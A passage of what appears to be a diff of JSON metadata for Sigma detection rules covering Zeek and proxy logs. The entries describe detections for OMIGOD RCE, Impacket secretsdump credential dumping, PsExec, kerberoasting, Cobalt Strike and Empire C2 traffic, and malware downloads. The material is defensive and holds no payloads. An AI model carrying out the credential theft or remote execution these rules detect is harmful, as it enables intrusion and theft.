- ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", - "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", - "value": "OMIGOD HTTP No Authentication RCE", - "meta": { - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://twitter.com/neu5ron/status/1438987292971053057?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.lateral_movement", - "attack.t1068", - "attack.t1190", - "attack.t1203", - "attack.t1021.006", - "attack.t1210" - ], - "creation_date": "2021/09/20", - "filename": "zeek_http_omigod_no_auth_rce.yml", - "author": "Nate Guagenti (neu5ron)", - "level": "high", - "falsepositive": [ - "Exploits that were attempted but unsuccessful.", - "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", - "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", - "value": "WebDav Put Request", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2020/05/02", - "filename": "zeek_http_webdav_put_request.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", - "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", - "value": "Publicly Accessible RDP Service", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1021/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" - ], - "tags": [ - "attack.t1021.001" - ], - "creation_date": "2020/08/22", - "filename": "zeek_rdp_public_listener.yml", - "author": "Josh Brower @DefensiveDepth", - "level": "high", - "falsepositive": [ - "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", - "value": "Remote Task Creation via ATSVC Named Pipe - Zeek", - "meta": { - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" - ], - "creation_date": "2020/04/03", - "filename": "zeek_smb_converted_win_atsvc_task.yml", - "author": "Samir Bousseaden, @neu5rn", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", - "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", - "value": "Possible Impacket SecretDump Remote Activity - Zeek", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" - ], - "creation_date": "2020/03/19", - "filename": "zeek_smb_converted_win_impacket_secretdump.yml", - "author": "Samir Bousseaden, @neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", - "value": "First Time Seen Remote Named Pipe - Zeek", - "meta": { - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/04/02", - "filename": "zeek_smb_converted_win_lm_namedpipe.yml", - "author": "Samir Bousseaden, @neu5ron, Tim Shelton", - "level": "high", - "falsepositive": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", - "value": "Suspicious PsExec Execution - Zeek", - "meta": { - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/04/02", - "filename": "zeek_smb_converted_win_susp_psexec.yml", - "author": "Samir Bousseaden, @neu5ron, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects known sensitive file extensions via Zeek", - "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", - "value": "Suspicious Access to Sensitive File Extensions - Zeek", - "meta": { - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" - ], - "tags": [ - "attack.collection" - ], - "creation_date": "2020/04/02", - "filename": "zeek_smb_converted_win_susp_raccess_sensitive_fext.yml", - "author": "Samir Bousseaden, @neu5ron", - "level": "medium", - "falsepositive": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", - "value": "Transferring Files with Credential Data via Network Shares - Zeek", - "meta": { - "refs": [ - "https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" - ], - "creation_date": "2020/04/02", - "filename": "zeek_smb_converted_win_transferring_files_with_credential_data.yml", - "author": "@neu5ron, Teymur Kheirkhabarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", - "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", - "value": "Kerberos Network Traffic RC4 Ticket Encryption", - "meta": { - "refs": [ - "https://adsecurity.org/?p=3458", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2020/02/12", - "filename": "zeek_susp_kerberos_rc4.yml", - "author": "sigma", - "level": "medium", - "falsepositive": [ - "Normal enterprise SPN requests activity" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", - "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", - "value": "Advanced IP/Port Scanner Update Check", - "meta": { - "refs": [ - "https://www.advanced-ip-scanner.com/", - "https://www.advanced-port-scanner.com/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1590" - ], - "creation_date": "2022/08/14", - "filename": "proxy_adv_ip_port_scanner_upd_check.yml", - "author": "Axel Olsson", - "level": "medium", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent string of APT40 Dropbox tool", - "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", - "value": "APT40 Dropbox Tool User Agent", - "meta": { - "refs": [ - "Internal research from Florian Roth", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2019/11/12", - "filename": "proxy_apt40.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Old browsers" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", - "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", - "value": "Domestic Kitten FurBall Malware Pattern", - "meta": { - "refs": [ - "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2021/02/08", - "filename": "proxy_apt_domestic_kitten.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Baby Shark C2 Framework communication patterns", - "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", - "value": "BabyShark Agent Pattern", - "meta": { - "refs": [ - "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2021/06/09", - "filename": "proxy_baby_shark.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects HTTP requests used by Chafer malware", - "uuid": "fb502828-2db0-438e-93e6-801c7548686d", - "value": "Chafer Malware URL Pattern", - "meta": { - "refs": [ - "https://securelist.com/chafer-used-remexi-malware/89538/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/01/31", - "filename": "proxy_chafer_malware.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Malleable Amazon Profile", - "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", - "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile", - "meta": { - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", - "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/11/12", - "filename": "proxy_cobalt_amazon.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", - "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", - "value": "CobaltStrike Malformed UAs in Malleable Profiles", - "meta": { - "refs": [ - "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2021/05/06", - "filename": "proxy_cobalt_malformed_uas.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", - "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", - "value": "CobaltStrike Malleable (OCSP) Profile", - "meta": { - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/11/12", - "filename": "proxy_cobalt_ocsp.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Malleable OneDrive Profile", - "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", - "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile", - "meta": { - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/11/12", - "filename": "proxy_cobalt_onedrive.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects WebDav DownloadCradle", - "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", - "value": "Windows WebDAV User Agent", - "meta": { - "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2018/04/06", - "filename": "proxy_downloadcradle_webdav.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative scripts that download files from the Internet", - "Administrative scripts that retrieve certain website contents", - "Legitimate WebDAV administration" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", - "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", - "value": "Download from Suspicious Dyndns Hosts", - "meta": { - "refs": [ - "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1105", - "attack.t1568" - ], - "creation_date": "2017/11/08", - "filename": "proxy_download_susp_dyndns.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Software downloads" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects download of certain file types from hosts in suspicious TLDs", - "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", - "value": "Download from Suspicious TLD", - "meta": { - "refs": [ - "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", - "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", - "https://www.spamhaus.org/statistics/tlds/", - "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566", - "attack.execution", - "attack.t1203", - "attack.t1204.002" - ], - "creation_date": "2017/11/07", - "filename": "proxy_download_susp_tlds_blacklist.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "All kinds of software downloads" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects executable downloads from suspicious remote systems", - "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", - "value": "Download EXE from Suspicious TLD", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566", - "attack.execution", - "attack.t1203", - "attack.t1204.002" - ], - "creation_date": "2017/03/13", - "filename": "proxy_download_susp_tlds_whitelist.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "All kind of software downloads" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects user agent and URI paths used by empire agents", - "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", - "value": "Empire UserAgent URI Combo", - "meta": { - "refs": [ - "https://github.com/BC-SECURITY/Empire", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2020/07/13", - "filename": "proxy_empire_ua_uri_combos.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Valid requests with this exact user agent to server scripts of the defined names" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious empty user agent strings in proxy logs", - "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", - "value": "Empty User Agent", - "meta": { - "refs": [ - "https://twitter.com/Carlos_Perez/status/883455096645931008", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/07/08", - "filename": "proxy_empty_ua.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects URL pattern used by iOS Implant", - "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", - "value": "iOS Implant URL Pattern", - "meta": { - "refs": [ - "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", - "https://twitter.com/craiu/status/1167358457344925696", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.collection", - "attack.t1005", - "attack.t1119", - "attack.credential_access", - "attack.t1528", - "attack.t1552.001" - ], - "creation_date": "2019/08/30", - "filename": "proxy_ios_implant.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", - "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", - "value": "Java Class Proxy Download", - "meta": { - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" - ], - "tags": [ - "attack.initial_access" - ], - "creation_date": "2021/12/21", - "filename": "proxy_java_class_download.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Windows PowerShell Web Access", - "uuid": "c8557060-9221-4448-8794-96320e6f3e74", - "value": "Windows PowerShell User Agent", - "meta": { - "refs": [ - "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/03/13", - "filename": "proxy_powershell_ua.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Administrative scripts that download files from the Internet", - "Administrative scripts that retrieve certain website contents" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", - "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", - "value": "PwnDrp Access", - "meta": { - "refs": [ - "https://breakdev.org/pwndrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.001", - "attack.t1102.003" - ], - "creation_date": "2020/04/15", - "filename": "proxy_pwndrop.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", - "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", - "value": "Raw Paste Service Access", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/domain/paste.ee/relations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.001", - "attack.t1102.003", - "attack.defense_evasion" - ], - "creation_date": "2019/12/05", - "filename": "proxy_raw_paste_service_access.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a flashplayer update from an unofficial location", - "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", - "value": "Flash Player Update from Suspicious Location", - "meta": { - "refs": [ - "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1189", - "attack.execution", - "attack.t1204.002", - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2017/10/25", - "filename": "proxy_susp_flash_download_loc.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown flash download locations" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", - "uuid": "b494b165-6634-483d-8c47-2026a6c52372", - "value": "Telegram API Access", - "meta": { - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.002" - ], - "creation_date": "2018/06/05", - "filename": "proxy_telegram_api.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate use of Telegram bots in the company" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Turla ComRAT patterns", - "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", - "value": "Turla ComRAT", - "meta": { - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001", - "attack.g0010" - ], - "creation_date": "2020/05/26", - "filename": "proxy_turla_comrat.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent strings used in APT malware in proxy logs", - "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", - "value": "APT User Agent", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/11/12", - "filename": "proxy_ua_apt.yml", - "author": "Florian Roth, Markus Neis", - "level": "high", - "falsepositive": [ - "Old browsers" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", - "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", - "value": "Bitsadmin to Uncommon IP Server Address", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190" - ], - "creation_date": "2022/06/10", - "filename": "proxy_ua_bitsadmin_susp_ip.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Bitsadmin connections to domains with uncommon TLDs", - "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", - "value": "Bitsadmin to Uncommon TLD", - "meta": { - "refs": [ - "https://twitter.com/jhencinski/status/1102695118455349248", - "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190" - ], - "creation_date": "2019/03/07", - "filename": "proxy_ua_bitsadmin_susp_tld.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", - "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", - "value": "Crypto Miner User Agent", - "meta": { - "refs": [ - "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", - "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/10/21", - "filename": "proxy_ua_cryptominer.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", - "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", - "value": "Exploit Framework User Agent", - "meta": { - "refs": [ - "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/07/08", - "filename": "proxy_ua_frameworks.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent strings user by hack tools in proxy logs", - "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", - "value": "Hack Tool User Agent", - "meta": { - "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", - "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2017/07/08", - "filename": "proxy_ua_hacktool.yml", - "author": "Florian Roth", - 